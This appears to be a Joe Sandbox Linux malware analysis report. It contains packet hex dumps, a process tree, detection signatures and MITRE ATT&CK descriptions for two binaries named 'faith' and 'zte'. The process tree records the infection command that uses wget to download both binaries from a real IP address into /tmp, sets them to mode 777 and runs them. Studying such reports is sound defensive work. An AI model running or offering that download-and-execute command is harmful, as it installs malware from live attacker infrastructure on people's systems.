Nov 25, 2024 11:35:33.826955080 CET	248	IN	Data Raw: ce 58 a0 7e 3c cd 78 d1 f6 9d 03 b5 0d 8c 0f 14 df c2 51 12 9d 56 54 ff 4f f6 2b 6f 15 18 fd 5f f1 6b 06 39 db 4f 6a 8c 7a 8a eb 69 71 91 f3 71 a3 29 ec 87 ed 4e 8a 5e 32 20 72 d5 70 8e 81 73 0c 46 49 5f bb 40 f8 d3 0d 91 84 48 92 bc 4e 17 41 a2 Data Ascii: X~<xQVTO+o_k9Ojziqq)N^2 rpsFI_@HNA:\|>pOscrnu20Hp7MB)a%3u)f/6x.ozx[o9,?6]P&Nns
Nov 25, 2024 11:35:33.828022003 CET	1236	IN	Data Raw: 55 dc 19 98 db 84 71 0f fd 8b ed c6 c0 b8 81 8e 0f 3a 58 b3 3d 8a 01 8a 10 b4 8f 9f ea 08 7a 61 fe 24 d2 34 be 89 54 0d d9 3d 73 73 2b ac 90 10 d1 90 e8 91 33 2d e5 fb 4b c6 9f 21 ee 45 f4 3e 3f 9a 5b 88 fe ae f8 79 d3 3d 81 af c6 24 68 07 da 14 Data Ascii: Uq:X=za$4T=ss+3-K!E>?[y=$h$ts/{v/rA\|;0Sbi>XwBwAsbIklW/lBULj{vT"Y;k7:'nBSu']NC%+weXw2Y5\|#
Nov 25, 2024 11:35:33.828098059 CET	248	IN	Data Raw: a8 1c 13 fa e5 08 b3 27 29 4c 79 e7 fe 80 83 d4 09 0f c2 0f e1 ad 7a 3c d9 b6 19 d2 75 de 6c a3 c3 ef 52 0c ee 78 de b2 66 61 06 c1 de d0 fa 19 f5 cd 79 7a 43 e7 90 e2 4b 16 40 17 67 d7 2a 60 a4 87 6e 4b 72 09 5f c9 bc bf 8e eb 10 59 7d 41 ac 12 Data Ascii: ')Lyz<ulRxfayzCK@g*`nKr_Y}Ahyws[g,)@4qM3bkJzH}XmHJ/"lP,Y3Xu^XsEo"}2B1!z^g9 #4R(?[4FMC
Nov 25, 2024 11:35:33.828108072 CET	1236	IN	Data Raw: cb a6 de 5e 6a a4 c2 b8 c2 01 c9 6c 99 b6 33 e0 a4 56 b6 cd 87 fa 44 9f cc 40 5f ea 1b f0 2c 89 f0 2c 6f 8b 53 0a 23 ab 33 d1 bc 4d 09 8e bf a4 03 d1 6a 15 f4 87 33 2a 47 94 e4 a0 cc 43 d0 82 37 d6 58 5c a6 87 20 1f 19 f2 89 0a 64 64 da dd a0 36 Data Ascii: ^jl3VD@_,,oS#3Mj3GC7X\ dd6X{&I^YIJI\|Ufnn(Vhhi\zdD-Cr**"N~MumR?G"J8$qIc $U9\|%iQ&,v&&89+!(e
Nov 25, 2024 11:35:33.828116894 CET	248	IN	Data Raw: 39 2e bd 14 9e ac 0d 67 c9 b5 e1 75 9d 0d ee 0e 16 dc fa 25 61 9c 38 d4 3f fe f2 df 11 55 3f 5f 92 ab 65 76 ee 8a d5 32 c7 42 e4 e6 50 48 f6 86 02 85 fa e1 9b fa c2 e3 af 02 5b 1c 10 88 a3 66 70 f0 77 b7 eb 67 19 29 37 99 cf 03 90 d7 be fb 40 ba Data Ascii: 9.gu%a8?U?_ev2BPH[fpwg)7@,@dfB5/Fio0'tBtDY_%51=,_VWe]ttTuXPDW:_SN_+o<=Y"q>3##J>Dp@#j,y\QWurF.l"N?$X&
Nov 25, 2024 11:35:33.829205990 CET	1236	IN	Data Raw: 22 d5 ef 9a f2 2c 9b 8f 0a 5b 4a 0a 82 d6 fc 5b 0e 7e dd 2b 68 ea 39 99 00 a9 81 f9 de 30 02 08 19 82 fb 69 6d 23 fc 29 f5 35 6f 78 f8 7a d9 32 49 eb 6c 1a 6f 52 fe 27 14 48 c9 52 e0 10 00 e4 c5 ce f7 57 01 f0 c5 1a 26 e7 72 e2 4a 83 fb 69 3c 48 Data Ascii: ",[J[~+h90im#)5oxz2IloR'HRW&rJi<HS:K&Mj7-IH1 ]2(yU6F_Aq3<HU09a=6boSQ0nrF-\|K*9c!^\|jlT.C
Nov 25, 2024 11:35:33.938337088 CET	1236	IN	Data Raw: 97 dc ba 5b 0a c9 51 58 2e be 4f 68 f4 af 01 99 9a 2a 28 4b b1 02 6b be 28 09 52 9e fe a8 7a 02 76 52 65 3b 3c c0 ad 02 c4 2d 01 21 de fa d4 b9 b9 dc ea fc 08 b3 57 9f d3 0c 16 e3 a7 78 c9 99 cd da 31 b0 33 93 91 77 b2 01 2c 7a e1 2e e4 e9 01 54 Data Ascii: [QX.Oh(Kk(RzvRe;<-!Wx13w,z.TJ4!g+8`wK\Fn(?:f#:7[#>)Wk$ .3A?'kcPt>+Vt5#t^6$y;3jW>?ny{1z5_!Y'

System Behavior

Analysis Process: sh PID: 6228, Parent PID: 6152

General

Start time (UTC):	10:35:29
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "cd /tmp; wget http://65.175.140.164/images/faith;chmod 777 faith;./faith faith2;cd /tmp; wget http://65.175.140.164/images/zte;chmod 777 zte;./zte faith2;"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:29
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:29
Start date (UTC):	25/11/2024
Path:	/usr/bin/wget
Arguments:	wget http://65.175.140.164/images/faith
File size:	548568 bytes
MD5 hash:	996940118df7bb2aaa718589d4e95c08

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/usr/bin/chmod
Arguments:	chmod 777 faith
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/tmp/faith
Arguments:	./faith faith2
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/tmp/faith
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	sh -c mount
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/usr/bin/mount
Arguments:	mount
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/tmp/faith
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:31
Start date (UTC):	25/11/2024
Path:	/usr/bin/wget
Arguments:	wget http://65.175.140.164/images/zte
File size:	548568 bytes
MD5 hash:	996940118df7bb2aaa718589d4e95c08

Start time (UTC):	10:35:33
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:33
Start date (UTC):	25/11/2024
Path:	/usr/bin/chmod
Arguments:	chmod 777 zte
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	10:35:33
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:33
Start date (UTC):	25/11/2024
Path:	/tmp/zte
Arguments:	./zte faith2
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	10:35:33
Start date (UTC):	25/11/2024
Path:	/tmp/zte
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	10:35:33
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	sh -c mount
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:33
Start date (UTC):	25/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:33
Start date (UTC):	25/11/2024
Path:	/usr/bin/mount
Arguments:	mount
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Start time (UTC):	10:35:34
Start date (UTC):	25/11/2024
Path:	/tmp/zte
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	10:35:30
Start date (UTC):	25/11/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:30
Start date (UTC):	25/11/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	10:35:30
Start date (UTC):	25/11/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:35:30
Start date (UTC):	25/11/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Source: /bin/sh (PID: 6229)	Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/faith			Jump to behavior
Source: /bin/sh (PID: 6264)	Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/zte			Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164

Source: global traffic	HTTP traffic detected: GET /images/faith HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 65.175.140.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/zte HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 65.175.140.164Connection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: /tmp/faith (PID: 6254)	Shell command executed: sh -c mount			Jump to behavior
Source: /tmp/zte (PID: 6268)	Shell command executed: sh -c mount			Jump to behavior

Source: /tmp/zte	Avira: detection malicious, Label: PUA/AVF.Agent.jcccr
Source: /tmp/faith	Avira: detection malicious, Label: LINUX/AVI.Agent.dqzbs

Source: /tmp/faith (PID: 6252)	Deleted: /dev/test_write	Jump to behavior
Source: /tmp/faith (PID: 6252)	Written: /dev/test_write	Jump to behavior
Source: /tmp/zte (PID: 6266)	Deleted: /dev/test_write	Jump to behavior
Source: /tmp/zte (PID: 6266)	Written: /dev/test_write	Jump to behavior

Source: /bin/sh (PID: 6251)	Chmod executable: /usr/bin/chmod -> chmod 777 faith			Jump to behavior
Source: /bin/sh (PID: 6265)	Chmod executable: /usr/bin/chmod -> chmod 777 zte			Jump to behavior

Source: /usr/bin/dash (PID: 6232)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq			Jump to behavior
Source: /usr/bin/dash (PID: 6233)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq			Jump to behavior

Source: /usr/bin/chmod (PID: 6251)	File: /tmp/faith (bits: - usr: rwx grp: rwx all: rwx)			Jump to behavior
Source: /usr/bin/chmod (PID: 6265)	File: /tmp/zte (bits: - usr: rwx grp: rwx all: rwx)			Jump to behavior

Source: /bin/sh (PID: 6251)	Chmod executable with 777: /usr/bin/chmod -> chmod 777 faith			Jump to behavior
Source: /bin/sh (PID: 6265)	Chmod executable with 777: /usr/bin/chmod -> chmod 777 zte			Jump to behavior

Source: /usr/bin/wget (PID: 6229)	File written: /tmp/faith			Jump to dropped file
Source: /usr/bin/wget (PID: 6264)	File written: /tmp/zte			Jump to dropped file

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/dev/test_write

/tmp/faith

/tmp/zte

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: sh PID: 6228, Parent PID: 6152

General

Chronological Activities

Analysis Process: sh PID: 6229, Parent PID: 6228

General

Chronological Activities

Analysis Process: wget PID: 6229, Parent PID: 6228

General

Chronological Activities

Analysis Process: sh PID: 6251, Parent PID: 6228

General

Chronological Activities

Analysis Process: chmod PID: 6251, Parent PID: 6228

General

Chronological Activities

Analysis Process: sh PID: 6252, Parent PID: 6228

General

Chronological Activities

Analysis Process: faith PID: 6252, Parent PID: 6228

General

Chronological Activities

Analysis Process: faith PID: 6254, Parent PID: 6252

General